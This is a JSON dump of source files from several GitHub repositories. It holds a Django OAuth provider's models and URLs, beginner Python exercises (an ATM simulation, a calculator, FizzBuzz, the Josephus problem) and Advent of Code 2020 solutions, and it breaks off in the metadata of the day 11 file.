"text": "import base64\nimport os\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.forms.models import ModelForm\n\n\nclass Resource(models.Model):\n name = models.CharField(max_length=100)\n url = models.URLField()\n\n def __unicode__(self):\n return self.name\n\n\nclass ClientCredential(models.Model):\n key = models.CharField(max_length=30, blank=True)\n secret = models.CharField(max_length=30, blank=True)\n name = models.CharField(max_length=100)\n callback = models.URLField()\n user = models.ForeignKey(User)\n\n def __unicode__(self):\n return self.key\n\n def save(self, *args, **kwargs):\n if not self.key:\n self.key = base64.urlsafe_b64encode(os.urandom(30))\n if not self.secret:\n self.secret = User.objects.make_random_password(length=30)\n super(ClientCredential, self).save(*args, **kwargs)\n\n\nclass ClientCredentialForm(ModelForm):\n class Meta:\n model = ClientCredential\n fields = ('name', 'callback')\n\n\nclass Nonce(models.Model):\n nonce = models.CharField(max_length=30)\n timestamp = models.IntegerField()\n key = models.ForeignKey(ClientCredential)\n request_token = models.CharField(max_length=30, null=True)\n access_token = models.CharField(max_length=30, null=True)\n\n def __unicode__(self):\n return self.nonce\n\n\nclass TokenType(models.Model):\n token_type = models.CharField(max_length=10)\n\n def __unicode__(self):\n return self.token_type\n\n\nclass Token(models.Model):\n token_type = models.ForeignKey(TokenType)\n resource = models.ForeignKey(Resource)\n client_key = models.ForeignKey(ClientCredential)\n key = models.CharField(max_length=30, blank=True)\n secret = models.CharField(max_length=30, blank=True)\n timestamp = models.DateTimeField(auto_now_add=True)\n\n def save(self, *args, **kwargs):\n if not self.key:\n self.key = base64.urlsafe_b64encode(os.urandom(30))\n if not self.secret:\n self.secret = User.objects.make_random_password(length=30)\n super(Token, self).save(*args, **kwargs)\n\n\nclass Realm(models.Model):\n name = models.CharField(max_length=50)\n client_key = models.ForeignKey(ClientCredential)\n access_token = models.ForeignKey(Token, null=True)\n url = models.URLField(null=True)\n\n def __unicode__(self):\n return self.name\n"
},
{
"alpha_fraction": 0.6623376607894897,
"alphanum_fraction": 0.6623376607894897,
"avg_line_length": 33.22222137451172,
"blob_id": "1a3fb2e27a493507cbf817b21c924a7c53c4baea",
"content_id": "295c8323a4d5060a727c696ecc012e0842c71734",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 9,
"path": "/oauth/urls.py",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, url\n\nurlpatterns = patterns(\n '',\n url(r'^register/$', 'oauth.views.register'),\n url(r'^initiate/$', 'oauth.views.temporary_credentials_request'),\n url(r'^authorize/$', 'oauth.views.user_authorization'),\n url(r'^token/$', 'oauth.views.token_request'),\n)\n"
},
{
"alpha_fraction": 0.5785123705863953,
"alphanum_fraction": 0.71074378490448,
"avg_line_length": 19.16666603088379,
"blob_id": "3eb66981b3a44a068e30e25057571baac82f0427",
"content_id": "b5d248de5b8eb23d0bdfaad0dbe2c960d071bb28",
"detected_licenses": [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 121,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 6,
"path": "/requirements.txt",
"repo_name": "craigbruce/django-oauth",
"src_encoding": "UTF-8",
"text": "Django==1.5.0\npytz==2013b\nsouth==0.7.6\noauthlib==0.3.8\n#git+https://github.com/idan/oauthlib.git#egg=oauthlib\ntox==1.4.3\n"
}
] | 15 |
huangzhiyuan/python_learn
|
https://github.com/huangzhiyuan/python_learn
|
cf9560941460d46f90d551452a4714ccdb8b0460
|
c6c79b41b9b258ec32a0530afc5fc3678e352121
|
3ccaa12a566572697a4f1d493f441e3a6e537f63
|
refs/heads/master
| 2017-12-01T09:56:34.445471 | 2016-06-04T12:18:12 | 2016-06-04T12:18:12 | 60,399,493 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6679035425186157,
"avg_line_length": 22.478260040283203,
"blob_id": "54e9fbf438f058299134c1c264a2f0b6948078e0",
"content_id": "3596e3d7e618afb06c38a42a2a716075e76c1ff1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 539,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 23,
"path": "/generateRandomCode.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#!/bin/usr/python\r\rimport random\rimport sys\r\rdef generate_verificatin_code(len=6):\r\t'''notes: the words is from 0-9A-Za-z\r\tyou can also set the code_list = ['p','y','t']\r\tand so on'''\r\tcode_list = []\r\tfor i in range(10): #0-9\r\t\tcode_list.append(str(i))\r\tfor i in range(65,91): #A-Z\r\t\tcode_list.append(chr(i))\r\tfor i in range(97,123): #a-z \r\t\tcode_list.append(chr(i))\r\tmyslice = random.sample(code_list,len)\r\tverification_code = ''.join(myslice)\r\treturn verification_code\r\t\r\t\rcode = generate_verificatin_code(int(sys.argv[1]))\rprint code"
},
{
"alpha_fraction": 0.5014419555664062,
"alphanum_fraction": 0.515501081943512,
"avg_line_length": 32,
"blob_id": "14999589b6e618674d1d639c33eef8700cea2617",
"content_id": "ac02c809cbd43093f7c626604192615456a78fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2774,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 84,
"path": "/atm.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#!/bin/usr/python\r# -*- coding: UTF-8 -*-\rID = 999\rPASSWORD = 111\rMONEY = 10000\rID_ZHUAN = 123\rIS_GOON = 0\rWRONGTIME = 0\rprint \"welcome to use the blue machine of ATM\"\rwhile (IS_GOON == 0) :\r if WRONGTIME > 0 :\r print(\"input error,again\")\r print(\"input your card num\")\r id = int(input())\r print(\"input your card pass\")\r password = int(input())\r if id == ID and password == PASSWORD :\r IS_GOON = 1\r else :\r WRONGTIME += 1\r if WRONGTIME > 2 :\r print(\"the time your input error is three times,thanks for you using.\")\r break\rprint(\"---------------------------------------\")\rwhile IS_GOON == 1 :\r print(\"choose the num\")\r print(\"1.save\")\r print(\"2.withdow\")\r print(\"3.transfer\")\r print(\"4.balance inquiry\")\r print(\"5.change password\")\r print(\"---------------------------------------\")\r num_caozuo = int(input())\r if num_caozuo == 1 :\r print(\"input the mount you want save\")\r money = int(input())\r MONEY = MONEY + money\r print(\"seve success\")\r print(\"the balance is:\",MONEY)\r elif num_caozuo == 2 :\r print(\"input the mount you want withdow\")\r money = int(input())\r if money < MONEY :\r MONEY = MONEY - money\r print(\"withdow success\")\r print(\"the balance is:\",MONEY)\r else :\r print(\"withdow fail,the balance is insufficient\")\r elif num_caozuo == 3 :\r print(\"input the account id you want switch to:\")\r id_zhuan = int(input())\r if id_zhuan == ID_ZHUAN :\r print(\"input the mount you want switch to:\")\r money = int(input())\r if money < MONEY :\r print(\"transfer success\")\r else :\r print(\"the balance is insufficient\")\r else :\r print(\"the account is not exist\")\r elif num_caozuo == 4 :\r print(\"the balance is:\",MONEY)\r elif num_caozuo == 5 :\r print(\"input your old password\")\r password = int(input())\r if password == PASSWORD :\r print(\"input your new password\")\r password_new1 = int(input())\r print(\"input your new password again\")\r password_new2 = int(input())\r if password_new1 != password_new2 :\r print(\"twice time input is not same,cancel the change\")\r else :\r PASSWORD = password_new1\r print(\"change success\")\r else :\r print(\"the input password is error,cancel the change\")\r print(\"---------------------------------------\")\r print(\"is other operate? yes:0 no:1\")\r is_goon = int(input())\r if is_goon == IS_GOON :\r continue\r else :\r print(\"thanks for your using,bye.\")\r\t\t"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.7307692170143127,
"avg_line_length": 25.11111068725586,
"blob_id": "3da35e1b4d5d0c5966a84774a5fe3b8eec1f03c8",
"content_id": "28492756c81041d4f0cc33f84aa09cd1320273c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 9,
"path": "/fizzbuzz.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#!/bin/usr/python\r'''\r前段时间Jeff Atwood 推广了一个简单的编程练习叫FizzBuzz,问题引用如下:\r写一个程序,打印数字1到100,3的倍数打印“Fizz”来替换这个数,5的倍数打印“Buzz”,\r对于既是3的倍数又是5的倍数的数字打印“FizzBuzz”。\r这里就是一个简短的,有意思的方法解决这个问题:\r'''\r\rfor x in range(101): print\"fizz\"[x%3*4::]+\"buzz\"[x%5*4::] or x"
},
{
"alpha_fraction": 0.7066115736961365,
"alphanum_fraction": 0.7066115736961365,
"avg_line_length": 19.16666603088379,
"blob_id": "091b8a7e081c231f2db8738b342ba7a5a2daa654",
"content_id": "c2c69b463cdafe35f75354523810ed4bc662536e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 242,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 12,
"path": "/getNmaeAndIp.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#!usr/bin/python\r\rimport socket\r\r#get the host pc name\rmyname = socket.getfqdn(socket.gethostname()) \r\r#get the host ip\rmyaddr = socket.gethostbyname(myname)\r\rprint \"the name of your pc: %s \" % myname\rprint \"the ip of your pc : %s \" % myaddr\r"
},
{
"alpha_fraction": 0.48076921701431274,
"alphanum_fraction": 0.5256410241127014,
"avg_line_length": 14.699999809265137,
"blob_id": "db4820a8cd4f51a034042be80b9a42bf7cdfd56f",
"content_id": "17a508d8fa7701eea6fd0d7b88ab99464a93d879",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 10,
"path": "/reverse.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\r# -*- coding: UTF-8 -*-\r\rif __name__ == '__main__':\r ptr = [3,5,6,3,1,9]\r print ptr\r\tptr.reverse()\r\tprint ptr\r\tptr.sort()\r\tprint ptr"
},
{
"alpha_fraction": 0.4571428596973419,
"alphanum_fraction": 0.4928571283817291,
"avg_line_length": 13.448275566101074,
"blob_id": "855b1ec6f60bd98ca631e0a5fea2849682566f3f",
"content_id": "50cf2a9639a8242064e8389cb5446da3eccbb886",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 29,
"path": "/yuesefu.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#!/bin/usr/python\r\rif __name__=='__main__':\r\tmount = int(raw_input(\"input the number:\"))\r\tcount = int(raw_input(\"input the count:\"))\r\t\r\tnum = []\r\tfor i in range(mount):\r\t\tnum.append(i+1)\r\t\r\tprint num\r\t\r\ti = 0\r\tk = 0\r\tm = 0\r\t\r\twhile m < mount-1:\r\t\tif num[i] != 0 : k += 1\r\t\tif k == count:\r\t\t\tprint num[i]\r\t\t\tnum[i] = 0\r\t\t\tk = 0\r\t\t\tm += 1\r\t\ti += 1\r\t\tif i == mount : i = 0\r\t\r\ti = 0\r\twhile num[i] == 0:i += 1\r\tprint num[i]\r\t"
},
{
"alpha_fraction": 0.39206966757774353,
"alphanum_fraction": 0.42041873931884766,
"avg_line_length": 20.439023971557617,
"blob_id": "7f166d0b378e1655c084e400cc041b9614ea14b9",
"content_id": "06b53781834cef5e73235d408370b360b6d8a8ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7191,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 246,
"path": "/mfc.py",
"repo_name": "huangzhiyuan/python_learn",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\n#!/usr/bin/python\n# Filename M_F_C.py\n'''请输入你所要进行的运算法的相应序号。\n--------------------------------------------------------\n--------------------------------------------------------\n 加法:1 乘方:5\n 减法:2 求模:6\n 乘法:3 一元一次方程:7\n 除法:4 一元二次方程:8\n--------------------------------------------------------\n--------------------------------------------------------\n 想得到最新版,可以联系我,\n 或者,你可以自己动手来改变\n 源码。如果你有更好地解决方案,\n 请记得发给我你修过的程序。还有\n 别忘了写注释。\n 这样~我也更好地学习python。\n 毕竟我还 是菜鸟!(*^__^*)\n 有些地方很愚蠢,请指教吧!\n 我的联系方式:\n 邮箱:[email protected]\n QQ:785731535\n 微信:Sardar_24\n---------------------------------------------------------\n---------------------------------------------------------\n'''\nprint __doc__\n\ndef addition(a,b=0,) :\n equel1 = a+b\n print equel1\n return\n\ndef subdaction(a,b=0) :\n equel2 = a-b\n print equel2\n return\n\ndef multiplication(a,b=1) : \n equel3 = a*b\n print equel3\n return\n\ndef division(a,b=1.) :\n a1 = float(a)\n b1 = float(b)\n equel4 = a1/b1\n print equel4 \n return\n\ndef power(a,b) : \n b1 = float(b)\n equel5 = a ** b1\n print equel5 \n return\n\ndef remainder(a,b) : \n a1 = float(a)\n b1 = float(b)\n equel6 = a1%b1\n print equel6\n return\n\ndef leiou(a,b) :\n a1 = float(a)\n b1 = float(b)\n x=(0-b1)/a1\n print x\n return\n\ndef qewou(a1,b1,c1):\n a = float(a1)\n b = float(b1)\n c = float(c1)\n delta = (b ** 2) -( 4*a*c)\n if delta < 0 :\n print '此一元二次方程无实数根!'\n elif delta == 0 :\n x = -b/(2*a)\n print '根为:',x\n else : \n import math \n root = math.sqrt(delta)\n x1 = (-b+root)/(2*a)\n x2 = (-b-root)/(2*a)\n print '根分别为',x1,'和',x2\n return\n\nenter =int(raw_input('请输入序号 : '))\n\nif enter == 1 : \n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 请分别输入被加数和加数, \n 目前仅支持2个单独数字相加,\n 对此请谅解,我会尽快更新代码。\n\n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n entera1 = raw_input('被加数:')\n entera2 = raw_input('加数:')\n aen1 = float(entera1)\n aen2 = float(entera2)\n addition(aen1,aen2)\n \nelif enter == 2 : \n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 请分别输入被减数和减数, \n 目前仅支持2个单独数字相减,\n 对此请谅解,我会尽快更新代码。\n \n \n -------------------------------------------------\n -------------------------------------------------\n '''\n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n enters1 = raw_input('被减数:')\n enters2 = raw_input('减数:')\n sen1 = float(enters1)\n sen2 = float(enters2)\n subdaction(sen1,sen2)\n \n \nelif enter == 3 :\n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 请分别输入两个乘数, \n 目前仅支持2个单独数字相相乘,\n 对此请谅解,我会尽快更新代码。\n \n \n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n enterm1 = raw_input('乘数:')\n enterm2 = raw_input('乘数:')\n men1 = float(enterm1)\n men2 = float(enterm2)\n multiplication(men1,men2)\n \nelif enter == 4 :\n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 请分别输入被除数和除数, \n 目前仅支持2个单独数字相除,\n 对此请谅解,我会尽快更新代码。\n \n \n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n enterv1 = raw_input('被除数:')\n enterv2 = raw_input('除数:')\n ven1 = float(enterv1)\n ven2 = float(enterv2)\n division(ven1,ven2)\n \nelif enter == 5 :\n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 请分别输入底数和指数\n \n -------------------------------------------------\n 
-------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n entermax1 = raw_input('底数:')\n entermax2 = raw_input('指数:')\n maxen1 = float(entermax1)\n power(maxen1,entermax2)\n \nelif enter == 6 :\n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 求余数运算,请输入被除数和除数\n \n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n entermod1 = raw_input('被除数:')\n entermod2 = raw_input('除数:')\n moden1 = float(entermod1)\n moden2 = float(entermod2)\n remainder(moden1,moden2)\n \n \nelif enter == 7 :\n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 一元一次方程求解运算,你需要在\n 程序里输入相关数值前,请把一元\n 一次方程化为标准形式:\n ax+b=0(a不等于0)\n \n 然后分别输入未知数(x)的系数和\n 常数项。谢谢配合O(∩_∩)O\n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n enterlei1 = raw_input('未知数系数:')\n enterlei2 = raw_input('常数项:')\n leien1 = float(enterlei1)\n leien2 = float(enterlei2)\n leiou(leien1,leien2)\n \nelif enter == 8 :\n print '''\n 请仔细阅读下列使用说明!\n ---------------------说明-----------------------\n 一元二次方程求解你需要在\n 程序里输入相关数值前,请把一元\n 二次方程化为标准形式:\n ax**2+bx+c=0(a不等于0,**表示次方)\n \n 然后分别输入二次项的系数,一次项\n 系数,常数项。谢谢配合O(∩_∩)O\n -------------------------------------------------\n -------------------------------------------------\n ''' \n print '请根据上述说明,正确输入数字,请勿使用特殊符号 :'\n enterqou1 = raw_input('二次项系数:')\n enterqou2 = raw_input('一次项系数:')\n enterqou3 = raw_input('常数项:')\n qouen1 = float(enterqou1)\n qouen2 = float(enterqou2)\n qouen3 = float(enterqou3)\n if qouen1 == 0 :\n print '输入错误!二次项系数不能为零!'\n \n else : \n qewou(qouen1,qouen2,qouen3)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \n\t\t\n\t\t\n \n \n \n \n \n \n \n \n \n "
}
] | 7 |
genesis32/adventofcode2020
|
https://github.com/genesis32/adventofcode2020
|
0ae20844ade41086d3ec972f02daf467a0bd05df
|
a8a8307222ad80062b51ce5b5c87f05edde3929e
|
7f6a4519939e759c5bc9906590281c9d124c530f
|
refs/heads/main
| 2023-01-23T03:45:10.504467 | 2020-12-12T03:55:19 | 2020-12-12T03:55:19 | 319,186,682 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4871794879436493,
"alphanum_fraction": 0.5117056965827942,
"avg_line_length": 18.933332443237305,
"blob_id": "875c55bffbdcea4fff833a8c4ff42af87544b815",
"content_id": "091a20cd9190b35318dfccf33479d21d1535c9d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 897,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 45,
"path": "/day10.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nlines = [int(x.strip()) for x in open('day10.txt', 'r').readlines() if x != \"\"]\nlines.sort()\nlines.insert(0, 0)\nlines.append(lines[-1]+3)\n\nmemory = dict()\ndef valid_adapters(i, memory):\n if lines[i] == lines[-1]: \n return 1\n\n ret = 0\n for j in range(i+1, len(lines)):\n diff = lines[j] - lines[i]\n if diff > 3:\n break\n\n if i in memory:\n return memory[i]\n\n ret += valid_adapters(j, memory)\n\n memory[i] = ret\n return ret\n\ndef how_many_diff(): \n idx = 0 \n diff_one = 0 \n diff_three = 0\n while True:\n if idx >= len(lines)-1: break\n\n diff = lines[idx+1] - lines[idx]\n if diff == 1:\n diff_one += 1\n elif diff == 3:\n diff_three += 1\n\n idx += 1\n print(diff_one * diff_three)\n\n# how_many_diff()\nmemory = {}\nprint(valid_adapters(0, memory))\n"
},
{
"alpha_fraction": 0.5291222333908081,
"alphanum_fraction": 0.5586546063423157,
"avg_line_length": 28.7560977935791,
"blob_id": "682265691cffde3ce29561d2201ff7189509fad6",
"content_id": "d9f597dd4e447c8ab2ffa7a4c4f5737ea711356e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1219,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 41,
"path": "/day3.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\ndef find_path(forest):\n xindex = 0\n num_trees = 0\n for row in forest:\n if xindex >= len(row):\n return -1\n\n if row[xindex] == '#':\n num_trees += 1\n xindex += 3\n\n return num_trees\n\ndef find_path2(forest, x_stride, y_stride):\n num_jumps_per_line = len(forest[0]) / x_stride\n num_dupes = int(len(forest)/num_jumps_per_line)+1\n forest = [f*num_dupes for f in forest]\n xindex = 0\n num_trees = 0\n for currenty in range(0, len(forest), y_stride):\n if xindex >= len(forest[currenty]):\n return -1\n\n if forest[currenty][xindex] == '#':\n\n num_trees += 1\n xindex += x_stride\n\n return num_trees\n\n# print(find_path([x.rstrip()*33 for x in open(\"day3.txt\", \"r\").readlines()]))\n\na = find_path2([x.rstrip() for x in open(\"day3.txt\", \"r\").readlines()], 1, 1)\nb = find_path2([x.rstrip() for x in open(\"day3.txt\", \"r\").readlines()], 3, 1)\nc = find_path2([x.rstrip() for x in open(\"day3.txt\", \"r\").readlines()], 5, 1)\nd = find_path2([x.rstrip() for x in open(\"day3.txt\", \"r\").readlines()], 7, 1)\ne = find_path2([x.rstrip() for x in open(\"day3.txt\", \"r\").readlines()], 1, 2)\n\nprint(a * b * c * d * e)"
},
{
"alpha_fraction": 0.4954954981803894,
"alphanum_fraction": 0.5090090036392212,
"avg_line_length": 34.560001373291016,
"blob_id": "ffebfc0c2309cad2b4189ebc15d482f531883e08",
"content_id": "008212a89a88dc2ffe072140bccedfd258de10a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 888,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 25,
"path": "/day1.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\ndef find_two_that_sum(input, target):\n for v in input:\n other_value = target - v\n try:\n input.index(other_value) \n print(\"target=%d v=%s product=%d\" % (target, (v, other_value), v * other_value))\n return\n except:\n pass\n\ndef find_three_that_sum(input, target):\n for i in range(0, len(input)):\n for j in range(i+1, len(input)):\n for k in range(j+1, len(input)):\n sum = input[i] + input[j] + input[k]\n if sum == target:\n prod = input[i] * input[j] * input[k]\n print(\"target=%d v=%s product=%d\" % (target, (input[i], input[j], input[k]), prod))\n return\n \ninput = sorted([int(x) for x in open(\"day1.txt\", \"r\").readlines()])\nfind_two_that_sum(input, 2020)\nfind_three_that_sum(input, 2020)"
},
{
"alpha_fraction": 0.492704838514328,
"alphanum_fraction": 0.5129068493843079,
"avg_line_length": 27.30158805847168,
"blob_id": "8c3c425eda2e7f8295186aea6b9e186f223426c6",
"content_id": "c5ab9d8ec4d746bfc6e0f939ba1a0fea9910d049",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1782,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 63,
"path": "/day8.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport copy\n\ndef run_failed_acc_value():\n idx = 0\n global_acc = 0\n while True:\n if idx == len(instructions): break\n if instructions[idx][2] == 1:\n print(\"global_acc\", global_acc)\n break\n instructions[idx][2] += 1\n if instructions[idx][0] == \"nop\":\n idx += 1\n elif instructions[idx][0] == \"jmp\":\n idx += instructions[idx][1]\n elif instructions[idx][0] == \"acc\":\n global_acc += instructions[idx][1]\n idx += 1\n\ndef run_program(instructions):\n idx = 0\n global_acc = 0\n while True:\n if idx == len(instructions):\n print(\"global_acc\", global_acc)\n return True\n if instructions[idx][2] == 1:\n return False\n instructions[idx][2] += 1\n if instructions[idx][0] == \"nop\":\n idx += 1\n elif instructions[idx][0] == \"jmp\":\n idx += instructions[idx][1]\n elif instructions[idx][0] == \"acc\":\n global_acc += instructions[idx][1]\n idx += 1\n\ndef part2():\n idx = 0\n while True:\n my_instructions = copy.deepcopy(instructions)\n if my_instructions[idx][0] == \"nop\":\n my_instructions[idx][0] = \"jmp\"\n if run_program(my_instructions):\n print(\"success\")\n break\n elif my_instructions[idx][0] == \"jmp\":\n my_instructions[idx][0] = \"nop\"\n if run_program(my_instructions):\n print(\"success\")\n break\n idx += 1\n\nlines = [x.strip() for x in open('day8.txt', 'r').readlines()]\n\ninstructions = []\nfor line in lines:\n instruction, value = line.split()\n instructions.append([instruction, int(value), 0])\n\npart2()"
},
{
"alpha_fraction": 0.6317829489707947,
"alphanum_fraction": 0.6459948420524597,
"avg_line_length": 34.181819915771484,
"blob_id": "a885891e09460463880537ad5eea8b644f035f9f",
"content_id": "060da1d4f71ed357af2b579ed6cb9b20930b08e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 774,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 22,
"path": "/day2.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\ndef is_password_valid(line):\n num_times, symbol, password = line.split()\n symbol = symbol[:-1]\n minn, maxn = [int(x) for x in num_times.split(\"-\")]\n num_symbols_in_password = password.count(symbol)\n return num_symbols_in_password >= minn and num_symbols_in_password <= maxn\n\ndef is_password_valid2(line):\n num_times, symbol, password = line.split()\n symbol = symbol[:-1]\n minn, maxn = [int(x) for x in num_times.split(\"-\")]\n return (password[minn-1] == symbol or password[maxn-1] == symbol) and not (password[minn-1] == symbol and password[maxn-1] == symbol)\n\nlines = open(\"day2.txt\", \"r\").readlines()\n\nnum_valid = 0\nfor line in lines:\n if is_password_valid2(line):\n num_valid += 1\nprint(\"num valid: \", num_valid)\n"
},
{
"alpha_fraction": 0.6147443652153015,
"alphanum_fraction": 0.626634955406189,
"avg_line_length": 23.764705657958984,
"blob_id": "b129ebc32d0c36b8e1350ed659b8871efea9b0cf",
"content_id": "20ebe5e34675861075e981e35ea811c5256d3876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 841,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 34,
"path": "/day6.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\ndef group_answered_yes2(group):\n answered_yes = []\n for person in group: \n answered_yes.append(set(person))\n\n if len(answered_yes) == 1:\n return len(answered_yes[0])\n\n a = answered_yes[0].intersection(*answered_yes[1:])\n return len(a)\n\ndef group_answered_yes(group):\n answered_yes = set()\n for person in group: \n for q in person:\n answered_yes.add(q)\n return len(answered_yes)\n\nlines = open(\"day6.txt\", \"r\").readlines()\nnum_valid_records = 0\ncurrent_group = []\nnum_answered = 0\nfor line in lines:\n line = line.strip()\n if line == \"\":\n num_answered += group_answered_yes2(current_group)\n current_group = []\n continue\n current_group.append(line)\n\nnum_answered += group_answered_yes2(current_group)\nprint(\"num_answered:\", num_answered)"
},
{
"alpha_fraction": 0.5346938967704773,
"alphanum_fraction": 0.5401360392570496,
"avg_line_length": 29,
"blob_id": "a1e0b700953347d9e86ed7d284d53bdf813af872",
"content_id": "403592bf0ed04608f2b32cb6e7fa73d7b235a2e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1470,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 49,
"path": "/day7.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport re\n\nlines = [x.strip() for x in open('day7.txt', 'r').readlines()]\n\nmapping = dict()\nfor line in lines:\n root_bag = re.search(r'(\\w+ \\w+) bags contain', line)[1]\n sub_bags = re.findall(r'(\\d+) (\\w+ \\w+) bag', line)\n if not root_bag in mapping:\n mapping[root_bag] = dict([(b[1], int(b[0])) for b in sub_bags])\n\ndef find_shiny_gold():\n def find_shiny_gold_helper(mapping, keys, path, ret):\n for k in keys:\n if k == 'shiny gold':\n ret.append(tuple(path))\n else:\n path.append(k)\n find_shiny_gold_helper(mapping, mapping[k].keys(), path, ret)\n path.remove(k)\n s = set()\n for m in mapping:\n ret = []\n find_shiny_gold_helper(mapping, mapping[m].keys(), [m], ret)\n for path in ret:\n for bag in path:\n s.add(bag)\n return len(s)\n\n\ndef shiny_gold_contains():\n def shiny_gold_contains_helper(mapping, sub_bags):\n if len(sub_bags) == 0: \n return 0\n total = 0\n for bag in sub_bags:\n child_bags = shiny_gold_contains_helper(mapping, mapping[bag])\n if child_bags > 0:\n total += (sub_bags[bag] + sub_bags[bag] * child_bags)\n else:\n total += sub_bags[bag] \n return total\n\n return shiny_gold_contains_helper(mapping, mapping['shiny gold'])\n \nprint(find_shiny_gold())\nprint(shiny_gold_contains())\n"
},
{
"alpha_fraction": 0.5147162079811096,
"alphanum_fraction": 0.5311843156814575,
"avg_line_length": 25.165138244628906,
"blob_id": "15e582e5c422b11149eec35d3b2ed43026efbf9e",
"content_id": "bce5b2c5691f7f73711956ded4f5426b88b4d0f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2854,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 109,
"path": "/day11.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
